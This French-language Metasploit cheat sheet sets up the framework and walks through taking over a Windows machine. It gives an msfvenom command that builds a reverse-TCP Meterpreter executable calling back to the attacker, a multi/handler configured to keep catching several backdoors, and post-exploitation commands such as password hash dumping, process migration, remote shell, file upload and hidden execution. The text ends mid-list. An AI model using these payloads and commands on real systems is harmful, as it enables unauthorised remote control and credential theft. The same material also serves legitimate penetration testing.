msfdb init
service postgresql start
msfconsole
msf > db_rebuild_cache
Cela lance la reconstruction du cache en arrière-plan. Pour savoir quand cette construction est terminée, il suffit de lancer une recherche:
msf > search uac
Et interpréter le résultat !
Ensuite, lorsque la machine est redémarrée, pour profiter de la mise en cache, il faut lancer le service postgresql.
msfconsole
Lance une console de Metasploit.
msf > search <terme>
msf > info <module>
msf > use <module>
On entre alors dans une sous-console propre au module, qui nous permet d'effectuer des opérations sur le module:
show options: affiche les options du moduleset <option name> <option value>: défini les optionsexploit: exécute le moduleMeterpreter est une boîte à outils que l'on peut envoyer sur Windows pour ensuite prendre la main du poste. Lors de l'exécution du payload, celui-ci va contacter le poste de l'attaquant, qui aura alors la main sur le poste attaqué.
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o ./<payload>.exe
LHOST:LPORT est l'adresse de l'attaquant
C'est ce service que contactera le payload:
msf > use exploit/multi/handler msf > handler > set payload windows/x64/meterpreter/reverse_tcp msf > handler > show options msf > handler > # compléter les options nécessaires: IP: ip de la machine du pirate, PORT: port sur lequel le service va écouter msf > handler > set ExitOnSession false # Quand une backdoor nous a joint, continuer à écouter pour pouvoir répondre à d'autres backdoors. msf > handler > exploit -j -z
msf > handler > sessions -l # liste les sessions msf > handler > sessions -i <id de la session> # entrer dans une session pour interagir avec meterpreter
meterpreter > background # revient à la console metasploit meterpreter > help meterpreter > sysinfo # donne des infos sur le système meterpreter > getprivs # voir les privilèges dont on dispose meterpreter > shell # lance une invite de commande Windows meterpreter > hashdump # dump la base de mots de passe, nécessite d'être administrateur authentifié meterpreter > migrate # permet de migrer vers un processus existant légitime meterpreter > net users # liste les utilisateurs meterpreter > net user <username> # donne des infos sur l'utilisateur meterpreter > net localgroup Administrators # liste les utilisateurs locaux du groupe Administrators meterpreter > upload <localfile> # charge un fichier local vers la cible du meterpreter meterpreter > execute -H